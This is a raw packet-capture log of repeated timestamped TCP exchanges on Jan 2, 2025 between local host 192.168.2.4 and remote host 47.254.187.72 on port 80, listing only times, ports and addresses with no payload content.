                                                                            Jan 2, 2025 20:34:53.348512888 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.348541021 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.348552942 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.348563910 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.348573923 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.348578930 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.348583937 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.348591089 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.348593950 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.348606110 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.348624945 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.348627090 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.348647118 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.348663092 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.348737955 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.348750114 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.348761082 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.348777056 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.348790884 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.348890066 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.348906040 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.348916054 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.348927021 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.348937988 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.348948002 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.348957062 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.348957062 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.348968029 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.348983049 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.348990917 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.348999023 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.349009037 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.349009991 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.349020004 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.349030018 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.349050045 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.349055052 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.349061966 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.349065065 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.349076033 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.349087000 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.349097967 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.349113941 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.349145889 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.351346970 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.351361990 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.351380110 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.351389885 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.351401091 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.351411104 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.351413965 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.351421118 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.351433039 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.351433039 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.351454973 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.351474047 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.353540897 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.353552103 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.353562117 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.353573084 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.353583097 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.353585958 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.353593111 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.353604078 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.353616953 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.353632927 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.353656054 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.357237101 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.357249022 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.357259035 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.357294083 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.357310057 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.357321978 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.357326031 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.357332945 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.357343912 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.357355118 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.357363939 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.357392073 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.362107992 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.362124920 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.362138033 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.362148046 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.362159967 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.362170935 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.362181902 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.362183094 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.362206936 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.362241983 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.362267971 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.362284899 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.362296104 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.362310886 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.362312078 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.362322092 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.362332106 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.362333059 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.362343073 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.362365007 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.362380981 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.363094091 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.363131046 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.363141060 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.363159895 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.363173008 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.363188028 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.363200903 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.363209963 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.363212109 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.363221884 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.363234043 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.363239050 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.363257885 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.363284111 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.364383936 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.364396095 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.364406109 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.364418030 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.364434004 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.364437103 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.364443064 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.364454031 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.364454985 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.364464045 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.364485025 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.364509106 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.434598923 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.434638023 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.434648991 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.434659958 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.434670925 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.434676886 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.434689045 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.434699059 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.434710979 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.434712887 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.434721947 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.434740067 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.434755087 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.434757948 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.434767008 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.434775114 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.434777021 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.434787989 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.434798002 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.434807062 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.434809923 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.434840918 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.434863091 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.434878111 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.434887886 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.434899092 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.434911013 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.434916019 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.434928894 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.434954882 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.434956074 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.434971094 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.434983015 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.434986115 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.434993982 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.435003042 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.435003996 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.435019970 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.435038090 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.435056925 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.435067892 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.435080051 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.435097933 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.435097933 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.435112000 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.435116053 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.435122967 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.435146093 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.435172081 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.435228109 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.435239077 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.435256958 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.435267925 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.435270071 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.435278893 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.435288906 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.435297012 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.435301065 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.435323000 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.435342073 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.435380936 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.435390949 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.435401917 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.435415983 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.435420036 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.435431004 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.435436010 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.435441971 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.435462952 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.435463905 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.435473919 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.435482025 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.435486078 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.435504913 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.435529947 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.435600996 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.435611963 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.435622931 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.435642004 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.435642004 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.435652971 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.435663939 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.435668945 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.435686111 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.435709953 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.435791969 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.435802937 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.435812950 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.435822964 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.435825109 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.435834885 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.435846090 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.435878992 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.435959101 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.435970068 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.435981035 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.435990095 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.435998917 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.436002016 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.436012983 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.436017990 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.436022997 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.436034918 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.436063051 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.438133001 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.438153028 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.438163042 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.438196898 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.438225031 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.438235998 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.438241959 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.438246012 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.438257933 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.438261032 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.438267946 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.438278913 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.438307047 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.440143108 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.440174103 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.440190077 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.440201998 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.440211058 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.440212011 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.440237045 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.440265894 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.440341949 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.440351009 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.440361023 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.440371990 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.440383911 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.440418005 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.444108009 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.444123983 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.444134951 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.444145918 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.444150925 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.444158077 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.444168091 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.444175959 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.444179058 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.444190025 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.444211960 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.444226027 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.448823929 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.448846102 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.448857069 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.448874950 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.448896885 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.448920965 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.448931932 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.448942900 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.448954105 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.448962927 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.448971033 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.448996067 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.448996067 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.449019909 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.449031115 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.449040890 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.449050903 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.449060917 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.449060917 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.449071884 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.449089050 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.449105024 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.450016022 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.450026989 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.450037003 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.450047016 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.450053930 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.450062990 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.450073004 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.450073957 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.450083971 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.450094938 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.450117111 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.450133085 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.451057911 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.451116085 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.451124907 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.451126099 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.451136112 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.451153040 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.451154947 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.451163054 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.451179981 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.451190948 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.451190948 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.451211929 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.451235056 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.521439075 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.521455050 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.521473885 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.521485090 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.521495104 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.521512032 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.521517992 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.521528959 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.521539927 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.521539927 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.521548986 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.521553040 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.521559954 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.521570921 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.521579027 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.521579981 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.521596909 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.521598101 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.521609068 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.521617889 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.521617889 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.521629095 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.521636009 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.521640062 CET804973047.254.187.72192.168.2.4
